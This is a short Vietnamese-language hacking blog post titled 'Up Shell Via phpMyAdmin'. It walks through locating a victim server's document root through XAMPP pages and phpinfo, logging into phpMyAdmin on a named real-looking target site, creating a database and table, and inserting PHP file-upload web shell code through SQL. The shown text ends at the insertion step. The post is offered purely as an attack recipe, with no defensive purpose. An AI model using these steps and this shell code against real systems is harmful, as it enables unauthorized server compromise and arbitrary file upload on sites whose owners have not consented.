Up Shell Via phpMyAdmin

Thứ Sáu, 17 tháng 2, 2012

Up Shell Via phpMyAdmin

Bước 1: Tìm Path của document root

+ Thông thường vào link http://www.victim.com/xampp/ đê xem document root

Ví dụ: http://www.ehtpe.co.cu/xampp/

+ Vào Php infor() để xem path document root : C:/xampp/htdocs

Bước 2: Loggin và cơ sở dữ liệu:

+) http://www.ehtpe.co.cu/phpmyadmin

Bước 3: Tạo Database mới

Ví dụ: VHB_Group.

Sử dụng query: CREATE DATABASE VHB_Group; Hoặc như hình minh họa dưới:

Bước 4: Tạo table mớ

i +) Trong database VHB_Group vừa tạo, tạo table mới, đặt tên là soleil,

sử dụng query sau: CREATE TABLE soleil (contentshell varchar(10000) not null)

Bước 5: Chèn code shell

+) Chèn code shell upload vào table Soleil vừa được tạo, sử dụng câu lệnh:

INSERT INTO soleil VALUES ('<?php if ($HTTP_POST_VARS[\'submit\']) { if (!is_uploaded_file($HTTP_POST_FILES[\'file\'][\'tmp_name\'])) { $error = "You did not upload a file!"; unlink($HTTP_POST_FILES[\'file\'][\'tmp_name\']); // assign error message, remove uploaded file, redisplay form. } else { //A file was uploaded $maxfilesize=300000; if ($HTTP_POST_FILES[\'file\'][\'size\'] > $maxfilesize) { $error = "File is too large."; unlink($HTTP_POST_FILES[\'file\'][\'tmp_name\']); // assign error message, remove uploaded file, redisplay form. } else { //File has passed all validation, copy it to the final destination and remove the temporary file: copy($HTTP_POST_FILES[\'file\'][\'tmp_name\'],$HTTP_POST_FILES[\'file\'][\'name\']); unlink($HTTP_POST_FILES[\'file\'][\'tmp_name\']); print "File has been successfully uploaded!"; exit; } } } ?> <html> <head></head> <body> <form action="<?=$PHP_SELF?>" method="post" enctype="multipart/form-data">

Choose a file to upload:
<input type="file" name="file">
<input type="submit" name="submit" value="submit"> </form> </body> </html>');